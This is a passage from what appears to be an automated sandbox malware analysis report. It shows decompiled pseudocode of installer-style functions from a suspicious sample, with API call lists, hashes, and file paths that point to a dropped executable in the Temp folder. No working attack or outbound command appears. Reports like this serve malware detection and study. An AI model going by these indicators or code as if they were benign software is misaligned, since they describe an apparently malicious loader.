                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: CloseEnum$DeleteValue
                    • String ID:
                    • API String ID: 1354259210-0
                    • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                    • Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
                    • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                    • Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                    Download Yara Rule
                    C-Code - Quality: 77%
                    			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                    0x00401d81
                    0x00401d85
                    0x00401d9a
                    0x00401d87
                    0x00401d89
                    0x00401d8f
                    0x00401d8f
                    0x00401da0
                    0x00401da3
                    0x00401dad
                    0x00401db0
                    0x00401db8
                    0x00401dc9
                    0x00401dcc
                    0x00401dd7
                    0x00401dce
                    0x00401dd0
                    0x00401dd0
                    0x00401ddb
                    0x00401de5
                    0x00401e0c
                    0x00401e1b
                    0x00401e29
                    0x00401e31
                    0x00401e39
                    0x00401e39
                    0x00401e42
                    0x00401e48
                    0x00402ba4
                    0x00402ba4
                    0x00402c2d
                    0x00402c39

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                    • String ID:
                    • API String ID: 1849352358-0
                    • Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                    • Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
                    • Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                    • Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                    Download Yara Rule
                    C-Code - Quality: 73%
                    			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce08 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce0f = 1;
				 *0x40ce0c = _t15 & 0x00000001;
				 *0x40ce0d = _t15 & 0x00000002;
				 *0x40ce0e = _t15 & 0x00000004;
				E004066A5(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf8);
				_push(_t18);
				_push(_t31);
				E004065AF();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                    0x00401e4e
                    0x00401e59
                    0x00401e5b
                    0x00401e68
                    0x00401e7f
                    0x00401e84
                    0x00401e91
                    0x00401e96
                    0x00401e9a
                    0x00401ea5
                    0x00401eac
                    0x00401ebe
                    0x00401ec4
                    0x00401ec9
                    0x00401ed3
                    0x00402638
                    0x0040156d
                    0x00402ba4
                    0x00402c2d
                    0x00402c39

                    APIs
                    • GetDC.USER32(?), ref: 00401E51
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                    • ReleaseDC.USER32 ref: 00401E84
                      • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                      • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                    • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                    • String ID:
                    • API String ID: 2584051700-0
                    • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                    • Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
                    • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                    • Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                    Download Yara Rule
                    C-Code - Quality: 59%
                    			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                    0x00401c43
                    0x00401c45
                    0x00401c4c
                    0x00401c4f
                    0x00401c52
                    0x00401c5c
                    0x00401c60
                    0x00401c63
                    0x00401c6c
                    0x00401c6c
                    0x00401c6f
                    0x00401c73
                    0x00401c7c
                    0x00401c7c
                    0x00401c7f
                    0x00401c83
                    0x00401c85
                    0x00401cda
                    0x00401cdc
                    0x00401ce7
                    0x00401cf1
                    0x00401cf4
                    0x00401cf4
                    0x00401cfd
                    0x00000000
                    0x00401c87
                    0x00401c8e
                    0x00401c90
                    0x00401c93
                    0x00401c99
                    0x00401ca0
                    0x00401ca3
                    0x00401ccb
                    0x00401d03
                    0x00401d03
                    0x00401ca5
                    0x00401cb3
                    0x00401cbb
                    0x00401cbe
                    0x00401cbe
                    0x00401ca3
                    0x00401d06
                    0x00401d09
                    0x00401d0f
                    0x00402ba4
                    0x00402ba4
                    0x00402c2d
                    0x00402c39

                    APIs
                    • SendMessageTimeoutW.USER32 ref: 00401CB3
                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: MessageSend$Timeout
                    • String ID: !
                    • API String ID: 1777923405-2657877971
                    • Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                    • Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
                    • Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                    • Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00406536 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44registryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 91%
                    			E00406536(void* __ecx, void* __eflags, char _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t5 =  &_a4; // 0x422728
				_t21 = E004064D5(__eflags,  *_t5, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                    0x00406544
                    0x00406546
                    0x0040655b
                    0x0040655e
                    0x00406563
                    0x00406568
                    0x004065a6
                    0x004065a6
                    0x0040656a
                    0x0040657c
                    0x00406587
                    0x0040658d
                    0x00406598
                    0x00000000
                    0x00000000
                    0x00406598
                    0x004065ac

                    APIs
                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,0040A230,00000000,('B,00000000,?,?,"C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo,?,?,0040679D,80000002), ref: 0040657C
                    • RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,"C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo,"C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo,"C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo,00000000,00422728), ref: 00406587
                    Strings
                    • ('B, xrefs: 0040655B
                    • "C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo, xrefs: 0040653D
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: CloseQueryValue
                    • String ID: "C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo$('B
                    • API String ID: 3356406503-2931372168
                    • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                    • Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
                    • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                    • Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405F37 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 58%
                    			E00405F37(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}




                    0x00405f38
                    0x00405f45
                    0x00405f46
                    0x00405f51
                    0x00405f59
                    0x00405f59
                    0x00405f61

                    APIs
                    • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
                    • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F47
                    • lstrcatW.KERNEL32(?,0040A014), ref: 00405F59
                    Strings
                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: CharPrevlstrcatlstrlen
                    • String ID: C:\Users\user\AppData\Local\Temp\
                    • API String ID: 2659869361-3081826266
                    • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                    • Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
                    • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                    • Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040563E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                    Download Yara Rule
                    C-Code - Quality: 89%
                    			E0040563E(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x423734 != _t16) {
							_push(_t16);
							_push(6);
							 *0x423734 = _t16;
							E00404FFF();
						}
						L11:
						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404F7F(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404610(0x413);
				return 0;
			}





                    0x00405642
                    0x0040564c
                    0x00405668
                    0x0040568a
                    0x0040568d
                    0x00405693
                    0x0040569d
                    0x0040569e
                    0x004056a0
                    0x004056a6
                    0x004056a6
                    0x004056b0
                    0x00000000
                    0x004056be
                    0x00405675
                    0x004056ad
                    0x004056ad
                    0x00000000
                    0x004056ad
                    0x00405681
                    0x00405683
                    0x00000000
                    0x00405683
                    0x00405652
                    0x00000000
                    0x00000000
                    0x00405659
                    0x00000000

                    APIs
                    • IsWindowVisible.USER32 ref: 0040566D
                    • CallWindowProcW.USER32(?,?,?,?), ref: 004056BE
                      • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: Window$CallMessageProcSendVisible
                    • String ID:
                    • API String ID: 3748168415-3916222277
                    • Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                    • Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
                    • Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                    • Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004060BD Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                    0x004060cd
                    0x004060cf
                    0x004060d2
                    0x004060fe
                    0x004060d7
                    0x004060e0
                    0x004060e5
                    0x004060f0
                    0x004060f3
                    0x0040610f
                    0x004060f5
                    0x004060fc
                    0x00000000
                    0x004060fc
                    0x00406108
                    0x0040610c
                    0x0040610c
                    0x00406106
                    0x00000000

                    APIs
                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                    • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E5
                    • CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
                    • lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: lstrlen$CharNextlstrcmpi
                    • String ID:
                    • API String ID: 190613189-0
                    • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                    • Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
                    • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
